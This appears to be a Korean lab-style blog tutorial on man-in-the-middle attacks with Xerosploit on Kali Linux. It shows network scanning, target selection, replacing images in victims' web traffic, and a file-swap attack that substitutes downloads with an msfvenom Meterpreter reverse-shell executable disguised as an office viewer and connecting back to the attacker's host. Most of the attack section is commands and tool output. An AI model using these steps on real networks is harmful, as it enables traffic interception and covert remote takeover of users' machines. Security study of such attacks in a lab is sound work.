원문 : https://condencia.postype.com/post/2568876
원문 등록 일시 : 2018.11.22
실습 환경 : Kali Linux
1. MITM (Man In The Middle) 공격
1) Xeroexploit 다운로드
git clone 명령어를 통해 Xeroexploit을 다운로드한다.
Kali Linux에는 git이 기본적으로 설치되어 있지만, 그렇지 않은 경우에는 개별적으로 git을 설치한다.
1 | root@kali:/ git clone https://github.com/LionSec/xerosploit.git | cs |
명령어를 실행한 위치의 디렉토리에 xerosploit이라는 폴더가 생성된다.
2) 실행
1 2 3 4 5 6 7 8 9 10 11 12 13 | root@kali:~/ cd xerosploit root@kali:~/xerosploit/ sudo python install.py ┌══════════════════════════════════════════════════════════════┐ █ █ █ Xerosploit Installer █ █ █ └══════════════════════════════════════════════════════════════┘ [++] Please choose your operating system. 1) Ubuntu / Kali linux / Others 2) Parrot OS | cs |
이후로 python 쉘을 통해 단계별로 무엇을 할지 선택할 수 있다.
예를 들어 위 예시에서 OS를 선택하라고 했을 때, Linux를 사용하고 있다면 1이라고 입력하는 식이다.
3) Host Scan 및 타겟 지정
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | [++] Please choose your operating system. 1) Ubuntu / Kali linux / Others 2) Parrot OS >>> 1 >>> xerosploit [+] Please type 'help' to view commands. Xero ⇒ scan [++] Mapping your network ... [+]════════════[ Devices found on your network ]════════════[+] ╔════════════════╦═══════════════════╦═════════════════════╗ ║ IP Address ║ Mac Address ║ Manufacturer ║ ╠════════════════╬═══════════════════╬═════════════════════╣ ║ 192.168.86.1 ║ 00:50:59:D0:00:D2 ║ (VMware) ║ ║ 192.168.86.2 ║ 00:50:26:F5:88:02 ║ (VMware) ║ ║ 192.168.86.129 ║ 00:0B:31:D2:08:F7 ║ (VMware) ║ ║ 192.168.86.131 ║ 00:50:56:C0:00:D0 ║ (This device) ║ ║ ║ ║ ║ ╚══════════════════════════════════════════════════════════╝ [+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information Xero ⇒ | cs |
Xerosploit의 scan 명령어는 리눅스의 nmap 명령어와 비슷한 기능을 한다. 같은 네트워크 대역 상의 호스트들을 scan한다.
1 2 3 4 5 6 7 | Xero ⇒ 192.168.86.129 [++] 192.168.86.129 has been targeted. [+] Which module d o you want to load ? Enter 'help' for more information. Xero》modules ⇒ | cs |
target 호스트의 IP 주소를 입력하여 타겟으로 설정한다.
4. replace 모듈 선택 및 공격 실행
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | Xero》modules ⇒ replace ┌══════════════════════════════════════════════════════════════┐ █ █ █ Image Replace █ █ Replace all web pages images with your own one █ └══════════════════════════════════════════════════════════════┘ [+] Enter 'run' to execute the 'replace' command. Xero》modules》replace ⇒ run [+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png) Xero》modules》replace ⇒ /root/Desktop/attack_img.png [++] All images will be replaced by /root/Desktop/attack_img.png [++] Press 'Ctrl + C' to stop . | cs |
2. File 바꿔치기 공격 : windows 사용자가 파일을 다운받을 때 무슨 파일을 다운받던지 악성코드를 다운받을 수 있도록 한다.
1) 악성코드 준비
1 2 | root@kali:/ msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.86.131 lport=7777 -f exe > ~/malware/HOffice_2018_Viewer.exe | cs |
msfvenom은 metasploit의 독립된 payload 생성기이다. lhost, lport에 주는 IP 주소와 포트는 Kali 리눅스의 IP 주소를 사용한다.
2) Xeroexploit 사용
1 2 3 | Xero》modules》replace ⇒ run Xero》modules》replace ⇒ zip Xero》modules》replace ⇒ '/root/malware/test.exe' | cs |
'System > Cybersecurity' 카테고리의 다른 글
레지스터의 종류 - 범용 레지스터, 세그먼트 레지스터, 플래그 레지스터 (0) | 2019.03.09 |
---|---|
정보보안 단어 요약정리 (0) | 2018.12.01 |
Ubuntu 16.04 Privilege Escalation 취약점 공격 실습 - root 권한 얻기 (0) | 2018.12.01 |
Metasploit을 이용한 Kali Linux에서 원격으로 서버 콘솔에 접속 (0) | 2018.12.01 |
WordPress 취약점 공격 - LFI, AFD, AFU (1) | 2018.12.01 |